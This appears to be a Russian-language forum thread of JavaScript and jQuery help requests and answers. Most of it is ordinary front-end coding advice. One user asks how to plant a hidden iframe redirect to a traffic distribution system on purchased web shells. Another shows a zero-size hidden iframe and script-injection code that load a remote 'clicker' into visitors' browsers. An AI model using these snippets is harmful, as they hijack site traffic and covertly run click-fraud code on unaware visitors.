[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Без конкретной страницы тебе будет трудно помочь. Скинь или в лс, или сюда линк на страницу с данным шаблоном.
     
  2. Gigabajt_

    Gigabajt_ Member

    Joined:
    13 Feb 2010
    Messages:
    80
    Likes Received:
    5
    Reputations:
    0
    вот gif-vk.ru/
     
  3. seosimf

    seosimf Member

    Joined:
    3 Mar 2011
    Messages:
    271
    Likes Received:
    44
    Reputations:
    6
    Что-то типо такого:
    PHP:
    <script type="text/javascript">
    function 
    showHide(htm1Element)
    {
      if(
    htm1Element.style.display== 'none')
      {
        
    htm1Element.style.display='';
        
    htm1Element.style.background='#D1DAE0';
      }
      else
      {
         
    htm1Element.style.display='none';
         
    htm1Element.style.background='#F0F3F5';
      }
    }
    </script>
    <div id="md872" class="modBlock1" style="..." onclick="return showHide(this);"..........
    ПС только ты его не восстановишь, потому как второго клика не будет ибо он в none. Лучше вложи внутрь слой с уникальным id и передавай его id.
     
    #3643 seosimf, 25 Dec 2012
    Last edited: 25 Dec 2012
  4. Cowboyl0l

    Cowboyl0l New Member

    Joined:
    19 Nov 2011
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    как сделать 2 формы текстовые и 2 пары стрелочек что бы они друг другу не ебли мозги, что то невкурил, делаю 2ую пару и стрелки работают на 2их, обе пары. спасибо

    PHP:
    <form metod="get" action='auto.php'>
    <?$al = $_COOKIE['num']; $link = ("<input  type='text' id='text' onkeydown='test(event)' name='P' value='$al'>"); 
    echo $link; ?>
    <br />
    <input type="button" value="<<" onclick="cl('minus')"><input type="button" value=">>" onclick="cl('plus')">
    <input type="submit" value="Отправить">
    <br>
    <script>
        document.getElementById("text").focus();
        var selector = document.getElementById("text");
        function test(e){
            if(e)
            {
                if(e.keyCode == 37)
                    selector.value--;
                if(e.keyCode == 39)
                selector.value++;
            }
        }
        function cl(e){
            
            if(e==='minus')
                selector.value--;
            if(e==='plus')
                selector.value++;
        
        }
    </script>
     
  5. khvdaiver

    khvdaiver New Member

    Joined:
    29 Oct 2012
    Messages:
    79
    Likes Received:
    2
    Reputations:
    0
    можете внятно написать что не так и что вам нужно?
     
  6. kotkew

    kotkew New Member

    Joined:
    10 Jan 2013
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Подскажите пожалуйста - нужно, чтоб при обновлении страницы фон div'а каждый раз загружался заново, а не кеш из браузера.
    Div имеет вид
    HTML:
    <div style="background: url(/imgs/img.png);" class="img" onmouseover="this.style.backgroundPosition='80px 0px'" onmouseout="this.style.backgroundPosition='0px 0px'"></div>
    Заранее благодарю.
     
  7. MO3G

    MO3G Banned

    Joined:
    19 Mar 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    -10
    Опыта мало
    тока подался в тему трафика
    помогите советом
    закупился шелами (забугорными)
    как правльно вставить ифрейм с редиректом(куда лучше вставлять) на тдс что бы шелл жил продолжительное время
    Отблагодарю
    заранее спасибо)
     
  8. Тых

    Тых New Member

    Joined:
    30 Jan 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Есть скрипт разворачивания/сворачивания текста. Помогите сделать так, чтобы изначально он был развернут. Заранее благодарен.

    Code:
    	<script type="text/javascript">
    	$(document).ready(function(){                                                  
    		$('.view-source .hide').hide();
    		$('.view-source .shadow').toggle(
    		  function(){
    			$(this).siblings('.hide').stop(false, true).slideDown(500);
    			$(this).html('Скрыть');
    		  },
    		 function(){
    			$(this).siblings('.hide').stop(false, true).slideUp(500);
    			$(this).html('Показать');
    		 }
    	   );
    	});
    	</script>
    
    	<div class="view-source">
    	<div style="display: none;" class="hide nocookies">Текст</div>
    	<div class="shadow">Показать</div>
    	</div>
    
     
  9. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    убрать:
    HTML:
    $('.view-source .hide').hide();
    HTML:
    <div style="display: none;" class="hide nocookies">Текст</div>
    переделать в:
    HTML:
    <div class="hide nocookies">Текст</div>
     
    #3649 Melfis, 13 Jan 2013
    Last edited: 13 Jan 2013
    1 person likes this.
  10. Тых

    Тых New Member

    Joined:
    30 Jan 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Melfis, спасибо. Все работает, но сворачивается со второго раза. Исправил, поменяв местами эти строчки:

    Code:
    	<script type="text/javascript">
    	$(document).ready(function(){
    		$('.view-source .shadow').toggle(
    		  function(){
    			[COLOR=Red]$(this).siblings('.hide').stop(false, true).slideUp(500);
    			$(this).html('Показать');[/COLOR]
    		  },
    		 function(){
    			[COLOR=Red]$(this).siblings('.hide').stop(false, true).slideDown(500);
    			$(this).html('Скрыть');[/COLOR]
    		 }
    	   );
    	});
    	</script>
    
     
  11. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    как подключить .js через .js?
     
    #3651 blesse, 18 Jan 2013
    Last edited: 18 Jan 2013
  12. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    Скопировать содержимое одного в другой не вариант?
     
  13. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    1111
     
    #3653 justonline, 18 Jan 2013
    Last edited: 18 Jan 2013
  14. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    такая трабла
    на хосте скипт(кликер)- x.x.x.x/index.php
    Сую в страницу такое:
    Code:
    <iframe src="x.x.x.x/index.php" width="0" height="0" frameborder="0"><
    - все норм скипт грузит браузер и робит пока посетитель страницу не закроет.
    хочу тоже но через js сую:
    Code:
    <script type="text/javascript">
    document.write("[CODE]<script src='x.x.x.x/index.php'></script>");
    </script>
    и ничего хорошего не выходит, незнаю как выражить правильно браузер как будто один раз загружает скипт и все хотя скрипт дает каждую секунду новые данные.Насколько я понял это конструкция [CODE]<script src='x.x.x.x/index.php'></script>");
    </script>
    так работает пытался заменить на это-
    Code:
    <script type="text/javascript">
    document.write("<iframe src="x.x.x.x/index.php" width="0" height="0" frameborder="0">");
    </script>
    Но вообще отказалось работать.
     
  15. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    щто я делаю не так?
     
    1 person likes this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    где имя функции?

    если это анонимная функция то нужно присвоить его к переменной, потом запустить его

    или сразу запустить после обявления
    Code:
    wtf = function(){ 
     var sc=document.createElement("SCRIPT");
     sc.src="http://выава/scr.js";
     document.getElementsByTagName('body')[0].appendChild(sc);
     }[COLOR=Red]();[/COLOR]
    
     
    _________________________
    #3656 Konqi, 22 Jan 2013
    Last edited: 22 Jan 2013
    1 person likes this.
  17. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Или без присваивания
    (function(){тело функции}())
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    jquery
    $('html').on('click', '.spoofLink', function(click) {
    как сделать реакцию не на клик, а просто вызов по загрузке как в обычном js - онлоадом или маусовером
     
    #3658 justonline, 23 Jan 2013
    Last edited: 23 Jan 2013
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    не очень понятно суть вопроса

    если хотите запустить код сразу после загрузки документа то

    $(document).ready(function() {
    /* тут код */
    });

    Или так

    $(function() {
    /* код тут */
    });
     
    _________________________
  20. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    не по вопросу, но к сведению:
    приведённая конструкция будет работать медленнее, чем $('selector').on('click', callback);
    т.к. в первом случае слушается весь дом - происходит всплытие (bubbling) собития от места клика и на каждом элементе проверяется селектор .spoofLink.

    Ну это я так в качестве просвещения и из-за нелюбви к ливу(live - старый метод в жк) )
     
Loading...
Thread Status:
Not open for further replies.